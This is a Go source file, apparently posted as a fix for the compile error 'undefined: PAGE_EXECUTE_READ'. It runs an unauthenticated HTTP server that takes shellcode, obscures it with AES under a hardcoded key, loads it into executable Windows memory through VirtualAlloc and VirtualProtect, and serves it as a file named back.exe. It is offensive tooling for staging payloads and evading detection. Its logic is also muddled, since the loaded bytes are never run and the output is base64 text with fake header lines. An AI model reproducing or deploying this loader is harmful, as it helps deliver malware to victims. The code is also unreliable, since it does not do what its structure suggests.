package main

import ( "bytes" "crypto/aes" "crypto/cipher" "encoding/base64" "fmt" "log" "net/http" "syscall" "unsafe" "io" )

// Windows API entry points used by generatePayload. NewLazyDLL and NewProc
// only record the names; the DLL and each procedure are resolved the first
// time the corresponding Call is made, so a name the DLL does not export is
// not reported here but at that first call.
var (
	kernel32                = syscall.NewLazyDLL("kernel32.dll")
	virtualAlloc            = kernel32.NewProc("VirtualAlloc")
	virtualProtect          = kernel32.NewProc("VirtualProtect")
	rtlMoveMemory           = kernel32.NewProc("RtlMoveMemory")
	ntFlushInstructionCache = kernel32.NewProc("NtFlushInstructionCache")
)

// Windows memory-management flags passed to VirtualAlloc and VirtualProtect
// in generatePayload.
const (
	PAGE_EXECUTE_READWRITE = 0x40   // page protection: readable, writable and executable
	MEM_COMMIT             = 0x1000 // allocation type: commit the pages
	MEM_RESERVE            = 0x2000 // allocation type: reserve the address range
	PAGE_EXECUTE_READ      = 0x20   // page protection: readable and executable; the constant whose absence caused "undefined: PAGE_EXECUTE_READ"
)

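// main registers the two HTTP handlers on the default mux and serves them on
// port 8080 of every local interface.
//
// Neither route performs any authentication, so every host that can reach
// the port can submit bytes that this process then copies into executable
// memory (see generatePayload). Treat the listener as exposed to untrusted
// input.
func main() {
	http.HandleFunc("/", handleShellcode)
	http.HandleFunc("/download", handleDownload)

	// ListenAndServe only returns on failure (for example when the port is
	// already taken). Report the error instead of exiting silently with
	// status 0.
	if err := http.ListenAndServe(":8080", nil); err != nil {
		log.Fatal(err)
	}
}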

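// handleShellcode accepts a POST whose body is raw bytes, passes them through
// encryptShellcode and writes the result of generatePayload as the response.
// Any other method is answered with 405.
//
// The route is registered on "/" without authentication, so the body is
// untrusted input. The read is capped so a single request cannot make the
// server buffer an arbitrarily large body in memory.
func handleShellcode(w http.ResponseWriter, r *http.Request) {
	// Upper bound on the accepted request body; a larger upload fails the
	// read below and is answered like any other read error.
	const maxBodyBytes = 1 << 20

	if r.Method != http.MethodPost {
		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
		return
	}

	shellcode, err := io.ReadAll(http.MaxBytesReader(w, r.Body, maxBodyBytes))
	if err != nil {
		log.Println(err)
		http.Error(w, "Internal server error", http.StatusInternalServerError)
		return
	}

	encryptedShellcode, err := encryptShellcode(shellcode)
	if err != nil {
		log.Println(err)
		http.Error(w, "Internal server error", http.StatusInternalServerError)
		return
	}

	payload := generatePayload(encryptedShellcode)
	// The status line is already sent once Write starts, so a failure here
	// can only be logged.
	if _, err := w.Write(payload); err != nil {
		log.Println(err)
	}
}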

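// handleDownload base64-decodes the "shellcode" query parameter, passes the
// bytes through encryptShellcode and generatePayload, and returns the result
// as an attachment named back.exe.
//
// The parameter is untrusted and the route is unauthenticated and accepts
// any HTTP method. Because the data travels in the URL it also ends up
// wherever URLs are recorded (access logs, proxies, browser history).
func handleDownload(w http.ResponseWriter, r *http.Request) {
	shellcode, err := base64.StdEncoding.DecodeString(r.URL.Query().Get("shellcode"))
	if err != nil {
		// Malformed input is the client's fault, not a server failure.
		log.Println(err)
		http.Error(w, "Bad request", http.StatusBadRequest)
		return
	}

	encryptedShellcode, err := encryptShellcode(shellcode)
	if err != nil {
		log.Println(err)
		http.Error(w, "Internal server error", http.StatusInternalServerError)
		return
	}

	payload := generatePayload(encryptedShellcode)

	// Set the download headers only once a payload exists, so that error
	// responses are not delivered as an attachment called back.exe.
	w.Header().Set("Content-Disposition", "attachment; filename=back.exe")
	w.Header().Set("Content-Type", "application/octet-stream")
	if _, err := w.Write(payload); err != nil {
		log.Println(err)
	}
}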

// encryptShellcode pads shellcode to the AES block size with PKCS5Padding and
// encrypts it with AES-128 in CBC mode. It returns ciphertext as long as the
// padded input, or the error from aes.NewCipher.
//
// The key is a constant in the source and the same 16 bytes are passed as
// the IV; no authentication tag is produced. The transformation is therefore
// deterministic and can be reversed by anyone who has this source or the
// compiled binary: it obscures the bytes but provides neither
// confidentiality nor integrity.
func encryptShellcode(shellcode []byte) ([]byte, error) {
	secret := []byte("0123456789abcdef")

	blk, err := aes.NewCipher(secret)
	if err != nil {
		return nil, err
	}

	plain := PKCS5Padding(shellcode, blk.BlockSize())
	out := make([]byte, len(plain))

	// secret is used a second time here, as the CBC initialisation vector.
	cipher.NewCBCEncrypter(blk, secret).CryptBlocks(out, plain)
	return out, nil
}

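// PKCS5Padding returns a new slice holding src followed by padding bytes so
// that the total length is a multiple of blockSize. Each padding byte has the
// value of the padding length; an input that is already block-aligned gets a
// full extra block.
//
// The result never shares memory with src. Appending directly to src would
// write the padding into the caller's backing array whenever src has spare
// capacity (as buffers returned by io.ReadAll usually do), silently
// clobbering whatever the caller keeps there.
//
// blockSize must be between 1 and 255: zero panics on the modulo and larger
// values do not fit in the single padding byte.
func PKCS5Padding(src []byte, blockSize int) []byte {
	padding := blockSize - len(src)%blockSize

	out := make([]byte, 0, len(src)+padding)
	out = append(out, src...)
	return append(out, bytes.Repeat([]byte{byte(padding)}, padding)...)
}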

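// generatePayload copies shellcode into a newly allocated memory region of
// this process and returns a text blob made of two header-like lines followed
// by the base64 encoding of shellcode. It returns nil when the input is empty
// or the allocation fails.
//
// Review notes:
//   - The region is committed as PAGE_EXECUTE_READWRITE, filled, and then
//     switched to PAGE_EXECUTE_READ. Nothing in this function releases it,
//     and the return value is built from the shellcode argument alone, so
//     each call leaves one more executable mapping of caller-supplied bytes
//     in the server process.
//   - The results of the copy, protect and flush calls are discarded, so a
//     failure of any of them goes unnoticed.
//   - The "Content-Type"/"Content-Disposition" lines are part of the
//     returned bytes; they are not HTTP response headers.
func generatePayload(shellcode []byte) []byte {
	if len(shellcode) == 0 {
		// &shellcode[0] below would panic on an empty slice.
		return nil
	}
	size := uintptr(len(shellcode))

	baseAddr, _, _ := virtualAlloc.Call(0, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if baseAddr == 0 {
		// This runs on the request path: log and give up on this request
		// instead of calling log.Fatal, which would let one failed
		// allocation terminate the whole server.
		log.Println("VirtualAlloc failed")
		return nil
	}

	_, _, _ = rtlMoveMemory.Call(baseAddr, (uintptr)(unsafe.Pointer(&shellcode[0])), size)

	var oldProtect uintptr
	_, _, _ = virtualProtect.Call(baseAddr, size, PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
	_, _, _ = ntFlushInstructionCache.Call(0, baseAddr, size)

	return []byte(fmt.Sprintf("Content-Type: application/octet-stream\r\nContent-Disposition: attachment; filename='back.exe'\r\n\r\n%s", base64.StdEncoding.EncodeToString(shellcode)))
}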

Go 编译错误解决:undefined: PAGE_EXECUTE_READ

